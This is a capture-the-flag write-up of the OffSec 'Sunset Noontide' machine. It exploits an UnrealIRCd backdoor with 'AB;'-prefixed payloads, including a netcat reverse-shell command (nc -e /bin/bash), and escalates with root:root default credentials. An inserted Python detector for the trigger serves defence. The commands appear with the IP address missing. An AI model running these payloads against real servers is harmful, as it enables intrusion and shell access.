OffSec PG - Sunset Noontide


Machine IP →

Network Scan

Nmap scan → nmap -sC -sV -Pn -p- -A -o nmap.txt

OS Detection → Host:

| Port | Service | Other details (if any) |
| --- | --- | --- |
| 6667, 6697, 8067 | IRC | UnrealIRCd |


The only service is IRC, so I searched Exploit-DB via searchsploit for an exploit. This returned 4 entries. Looking at the code for the first one, there seems to be a backdoor that allows execution of shell commands for any input that starts with AB;.

Access can therefore be checked by connecting to the IRCd via netcat and sending the payload AB;echo "a" | nc 3002. With a listener active on the attacking machine at the IP used in the payload, a connection and the letter “a” would be received.

A similar payload can then be used to receive a shell via nc → AB;nc 3002 -e /bin/bash. This gives a shell as the server user. The home directory has the user flag.
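Seen from the defending side, the AB; prefix described above stands out on the wire because it is not a well-formed IRC command. The following is an added example, not part of the original write-up: a Python detector that reassembles a client-to-server IRC stream into lines and flags that prefix even when it is split across TCP segments. It assumes the unencrypted payload bytes have already been extracted; the class, function and sample data are constructed for illustration.

```python
import re

TRIGGER = b"AB;"  # prefix the write-up says reaches the backdoor
# Well-formed IRC message: optional ":prefix", then letters or a 3-digit numeric.
VALID_COMMAND = re.compile(rb"^(?::\S+ +)?(?:[A-Za-z]+|\d{3})(?: |$)")
# Constructed sample: one client stream, with the trigger split over two segments.
SAMPLE_CHUNKS = [b"NICK tester\r\nUSER t 0 * :t\r\nA", b'B;echo "a"\r\nPING :x\r\n']


def classify(line):
    """Return 'backdoor-trigger', 'malformed' or 'ok' for one client line."""
    if line.startswith(TRIGGER):
        return "backdoor-trigger"
    if line and not VALID_COMMAND.match(line):
        return "malformed"
    return "ok"


class IrcStreamInspector:
    """Buffers one client-to-server byte stream and inspects completed lines."""

    def __init__(self, max_line=4096):
        self.buf = b""
        self.max_line = max_line
        self.alerts = []

    def feed(self, chunk):
        """Add a payload chunk; return the alerts raised by lines it completed."""
        self.buf += chunk
        new = []
        while True:
            m = re.search(rb"\r?\n", self.buf)
            if not m:
                break
            line, self.buf = self.buf[:m.start()], self.buf[m.end():]
            verdict = classify(line)
            if verdict != "ok":
                new.append((verdict, line.decode("latin-1")))
        if len(self.buf) > self.max_line:  # unterminated, oversized line
            new.append(("oversized", self.buf[:64].decode("latin-1")))
            self.buf = b""
        self.alerts.extend(new)
        return new


if __name__ == "__main__":
    inspector = IrcStreamInspector()
    for chunk in SAMPLE_CHUNKS:
        for verdict, text in inspector.feed(chunk):
            print(f"ALERT {verdict}: {text!r}")
```

Because the check is anchored to the start of a line, ordinary chat text that merely contains the string inside a PRIVMSG is not flagged.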

Privilege Escalation

With the shell of the server user, trying the default credentials root:root works and gives a root shell. This gives the root flag.

This post is licensed under CC BY 4.0 by the author.